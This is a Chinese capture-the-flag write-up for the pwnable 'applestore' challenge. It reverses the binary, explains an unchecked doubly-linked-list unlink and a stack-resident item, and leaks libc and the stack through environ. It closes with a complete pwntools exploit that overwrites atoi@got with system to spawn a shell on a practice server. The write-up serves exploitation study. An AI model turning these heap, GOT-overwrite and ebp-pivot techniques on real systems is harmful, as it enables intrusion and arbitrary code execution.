pwnable_applestore
checksec
IDA
由add和insert可以逆向出每一个设备的结构体
typedef struct shop
{
char *name;
int price;
Shop *bk;
Shop *fd;
}Shop,PShop
delete
......
while ( item )
{
if ( v1 == idx )
{
BK = item->bk;
FD = item->fd;
if ( FD )
FD->bk = BK;
if ( BK )
BK->fd = FD;
printf("Remove %d:%s from your shopping cart.\n", v1, item->Name);
return __readgsdword(0x14u) ^ v7;
}
++v1;
item = item->bk;
}
.......
这功能是把chunk从item双链中取出,但是只校验了FD、BK的存在,没有校验合理性,如果我们可以控制 Item 的fd、bk,就能实现 unlink 的效果
栈内变量覆盖
那么如何控制fd、bk
checkout
v4 = __readgsdword(0x14u);
total = cart();
if ( total == 7174 )
{
puts("*: iPhone 8 - $1");
asprintf(&a1, "%s", "iPhone 8");
a1_4 = 1;
insert(&a1);
total = 7175;
}
printf("Total: $%d\n", total);
puts("Want to checkout? Maybe next time!");
我们回顾add,发现每一个 item 都是以堆的方式存在双链表中,而当总价为7174时,会赠送price为1的item,而这个item是在栈上面的,但是如何实现栈的修改呢?
有两个可以利用的漏洞点
Cart
int cart()
{
signed int j; // eax
signed int counter; // [esp+18h] [ebp-30h]
int total; // [esp+1Ch] [ebp-2Ch]
Shop *I; // [esp+20h] [ebp-28h]
char buf; // [esp+26h] [ebp-22h]
unsigned int v6; // [esp+3Ch] [ebp-Ch]
v6 = __readgsdword(0x14u);
counter = 1;
total = 0;
printf("Let me check your cart. ok? (y/n) > ");
fflush(stdout);
my_read(&buf, 0x15u);
if ( buf == 'y' )
{
puts("==== Cart ====");
for ( I = item_804B070; I; I = I->bk )
{
j = counter++;
printf("%d: %s - $%d\n", j, I->Name, I->price);
total += I->price;
}
}
return total;
}
这里看上去没问题,但是我们仔细在栈帧上看
这样就控制了 fd、bk
泄露libc
然后我们就想泄露libc
Cart里面会输出当前所有的Item,而之前我们已经可以控制 item 的fd和bk,那先换为 atoi@got,这样去泄露
因为程序是 Partial RELRO ,所以可以覆盖got表实现getshell
如何得到7174
这个穷举也可
total = 0
counter = 1
while 1:
total += 199*counter
if (7174-total)%299==0:
print counter
print (7174-total)/299
break
total = 0
counter+=1
6个item_1,20个item_2
思路
- 控制 item 的fd和bk,那先换为 atoi@got,泄露libc
- 在
deleteItem->fd=aoti-8,Item->bk=system,将atoi换为system - getshell
但是控制 item 的fd和bk的机会只有一次,无法完成填入system的参数,后面看Writeup才知道还有一种方法
可以通过libc中的environ来泄露栈地址, 泄露了栈地址后通过调试算出偏移可以得到delete函数的ebp地址,delete函数中的ebp指向的是handler函数中的ebp
ebp -> handler_ebp可以通过改写handler_ebp 为got_atoi + 0x22来完成对got表的覆写
从delete函数返回到handler函数中, 还原栈帧的过程中ebp 的值为改写成got_atoi - 0x22, 这样在调用my_read 函数中时可以对got_atoi 进行覆写, 改写了got表后要考虑的就是/bin/sh 的位置, 可以看到atoi 的参数就是刚刚输入的数据, 这时可以输入p32(system) + "|| /bin/sh"或 p32(system) + “;/bin/sh” 来绕过system 调用/bin/sh
————————————————
版权声明:本文为CSDN博主「苍崎青子」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/qq_43189757/article/details/102850665
这里再强调几个概念:
EBP:栈底指针该寄存器
ESP:栈顶指针寄存器
程序运行时栈地收缩或扩张,也就是ebp和esp的增大或减小
当我们delete结束时,返回到handle,当handle恢复栈时,假设再返回时我们把ebp变成了 atoi@got+0x22
此时的栈
利用EBP收缩让 atoi@got+0x22变为handle的EBP,然后泄露environ来计算栈的地址来修复
我们构造的
这个时候atoi@got立马变成system,执行system("SYS_ADDR||/bin/sh;"),从而getshell
EXP
from pwn import *
import sys
name = sys.argv[1]
elf = ELF(name)
libc = elf.libc
# libc = ELF("libc-2.23.so")
sh = 0
l64 = lambda :u64(sh.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(sh.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :sh.sendlineafter(str(a),str(b))
sa = lambda a,b :sh.sendafter(str(a),str(b))
lg = lambda name,data : sh.success(name + ": 0x%x" % data)
se = lambda payload: sh.send(payload)
rl = lambda : sh.recv()
sl = lambda payload: sh.sendline(payload)
ru = lambda a :sh.recvuntil(str(a))
def cmd(ch):
sla("> ",ch)
def List():
cmd(1)
def Add(kind):
cmd(2)
sla("Device Number> ",kind)
def free(idx):
cmd(3)
sla("Item Number> ",idx)
def Cart(payload):
cmd(4)
sla("Let me check your cart. ok? (y/n) > ",payload)
def checkout(payload):
cmd(5)
sla("Let me check your cart. ok? (y/n) > ",payload)
def main(ip,port,debug,mode):
global sh
if debug==0:
context.log_level = "debug"
else:
pass
if mode==0:
sh = process(name)
else:
sh = remote(ip,port)
for i in range(6):
Add("1")
for i in range(20):
Add("2")
checkout("y")
Cart("ya"+p32(elf.got["atoi"])+p32(0))
libcbase = u32(ru("\xf7")[-4:])-libc.sym["atoi"]
environ = libcbase + libc.sym["environ"]
system = libcbase + libc.sym["system"]
lg("libcbase",libcbase)
lg("environ",environ)
lg("system",system)
Cart('ya' + p32(environ)+ p32(0))
ru("27: ")
stack = u32(sh.recv(4))
lg("stack",stack)
payload = '27' + p32(0) + p32(0)
payload += p32(elf.got["atoi"] + 0x22) + p32(stack - 0x100 - 0xc)
free(payload)
sla("> ", p32(system) + "||/bin/sh")
sh.interactive()
if __name__ == '__main__':
main("node3.buuoj.cn","25844",0,0)
